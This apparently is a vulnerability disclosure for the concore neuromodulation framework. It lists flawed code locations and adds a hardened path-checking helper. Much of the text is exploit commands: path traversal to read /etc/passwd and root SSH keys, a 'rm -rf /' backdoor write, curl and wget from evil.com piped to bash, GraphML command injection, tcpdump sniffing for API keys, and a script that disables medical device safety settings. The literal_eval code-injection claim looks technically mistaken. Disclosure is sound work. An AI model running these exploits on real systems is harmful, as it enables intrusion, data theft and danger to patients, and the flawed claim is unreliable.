EXECUTIVE SUMMARY
The CONTROL-CORE (concore) neuromodulation framework contains multiple critical vulnerabilities enabling remote code execution, arbitrary file access, and medical device compromise. These flaws affect all implementations and pose immediate patient safety risks.
Location: concore/concore.py:223,290,293
# VULNERABLE CODE
file_path = os.path.join(inpath+str(file_port_num), name)
file_path = os.path.join("../"+port_identifier, name)
Exploit:
concore.read(1, "../../../etc/passwd", "")
concore.write(1, "../../../tmp/backdoor.py", "import os;os.system('rm -rf /')")
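A hardened form of the path construction flagged at concore/concore.py:223,290,293, given here as an added example that is not concore's own code. The helper names (`safe_port_path`, `check_names`, `demo`) are hypothetical and the directory layout and sample names are constructed.

```python
import os
import tempfile


class PathEscapeError(ValueError):
    """Raised when a name resolves outside its port directory."""


def safe_port_path(base_dir, port, name):
    """Hypothetical stand-in for os.path.join(inpath+str(file_port_num), name)."""
    if not name or "\x00" in name:
        raise PathEscapeError("empty name or NUL byte")
    # realpath collapses ".." and follows symlinks, so the check sees the
    # location the OS would actually open.
    port_dir = os.path.realpath(base_dir + str(int(port)))
    candidate = os.path.realpath(os.path.join(port_dir, name))
    # os.path.join discards port_dir when name is absolute; commonpath
    # catches that as well as "../" sequences and symlink escapes.
    if os.path.commonpath([port_dir, candidate]) != port_dir:
        raise PathEscapeError("%r escapes %s" % (name, port_dir))
    if candidate == port_dir:
        raise PathEscapeError("name resolves to the port directory itself")
    return candidate


def check_names(base_dir, port, names):
    """Map each name to True (accepted) or False (rejected)."""
    results = {}
    for name in names:
        try:
            safe_port_path(base_dir, port, name)
            results[name] = True
        except PathEscapeError:
            results[name] = False
    return results


def demo():
    # Constructed layout: <tmp>/in1/ containing a symlink that points outside it.
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "in1"))
    os.symlink(root, os.path.join(root, "in1", "up"))
    names = ["concore.params", "../../../etc/passwd", "/etc/passwd", "up/x", "."]
    return check_names(os.path.join(root, "in"), 1, names)


if __name__ == "__main__":
    for name, ok in demo().items():
        print("%-22s %s" % (name, "accepted" if ok else "rejected"))
```

The check reflects the filesystem at resolution time, so the returned path should be opened immediately and the port directory should not be writable by untrusted processes.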
Location: concore/concore.py:149,256,323
# VULNERABLE CODE
params = literal_eval(sparams)
inval = literal_eval(ins)
Exploit:
# Create malicious concore.params
echo "__import__('os').system('curl evil.com/shell|bash')" > ./in1/concore.params
Location: concore/mkconcore.py:615-680
# VULNERABLE CODE
fbuild.write("mkdir docker-"+dockername+"\n")
fbuild.write("cp ../src/"+sourcecode+" .\n")
Exploit:
<!-- Malicious GraphML -->
<node id="n1"><data key="d0">evil; rm -rf /; echo pwned:</data></node>
Location: concore/tools/pwrap.py:13,85
# VULNERABLE CODE
apikey=open(concore.inpath+'1/concore.apikey').readline()
r = requests.post('http://www.controlcore.org/ctl/'+apikey, files=f)
print(apikey) # Logged in plaintext
Location: concore/concore.py:38,75
# VULNERABLE CODE - No encryption
self.socket.bind("tcp://*:5555") # Binds to all interfaces
# All ZeroMQ traffic in plaintext
Location: concore/concore.hpp:136,355
// VULNERABLE CODE
shmId_create = shmget(key, 256, IPC_CREAT | 0666); // World-writable
std::string message(sharedData_get, strnlen(sharedData_get, 256)); // No bounds check
Complete System Compromise Chain
#!/bin/bash
# 1. Path traversal to read SSH keys
python3 -c "import concore; print(concore.read(1, '../../../root/.ssh/id_rsa', ''))"
# 2. Code injection via params file
echo "__import__('subprocess').call(['wget','http://evil.com/backdoor.py','-O','/tmp/b.py'])" > ./in1/concore.params
# 3. Command injection via GraphML
cat > malicious.graphml << EOF
<graphml><node id="n1"><data key="d0">test; curl evil.com/shell.sh|bash; echo normal</data></node></graphml>
EOF
# 4. API key theft via network interception
tcpdump -i any host controlcore.org -A | grep -E "(apikey|authorization)"
# 5. Medical device parameter manipulation
python3 -c "import concore; concore.write(1, '../../../etc/medical/therapy.conf', 'amplitude=999999\nsafety_disabled=true')"
REFERENCES